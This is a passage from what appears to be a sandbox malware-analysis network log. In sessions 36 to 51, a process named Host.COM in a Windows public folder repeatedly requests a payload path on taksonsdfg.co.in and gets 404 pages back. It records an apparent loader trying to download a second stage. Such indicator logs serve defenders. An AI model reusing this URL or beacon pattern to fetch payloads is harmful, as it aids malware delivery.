                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:58 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:58 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:58 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:58 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    36 | 192.168.2.4 | 49809 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:59 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:59 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:59 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:59 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:59 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    37 | 192.168.2.4 | 49811 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:01 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:01 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:01 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:01 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:01 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    38 | 192.168.2.4 | 49813 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:02 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:02 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:02 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:02 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:02 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49816 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:03 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:03 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:03 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:03 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:03 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49823 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:04 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:04 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:04 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:04 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:04 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49830 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:05 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:05 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:05 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:05 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:05 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49842 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:06 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:07 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:06 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:07 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:07 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49848 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:07 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:08 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:08 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:08 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:08 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49858 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:09 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:09 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:09 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:09 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:09 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.449865108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:10 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:11 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:11 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:11 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:11 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    46 | 192.168.2.4 | 49877 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:12 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:12 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:12 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:12 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:12 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    47 | 192.168.2.4 | 49884 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:13 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:13 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:13 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:13 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:13 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    48 | 192.168.2.4 | 49891 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:14 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:14 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:14 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:14 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:14 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    49 | 192.168.2.4 | 49903 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:15 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:15 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:15 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:15 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:15 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    50 | 192.168.2.4 | 49910 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:16 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:16 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:16 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:16 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:16 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    51 | 192.168.2.4 | 49918 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:30:17 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:17 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
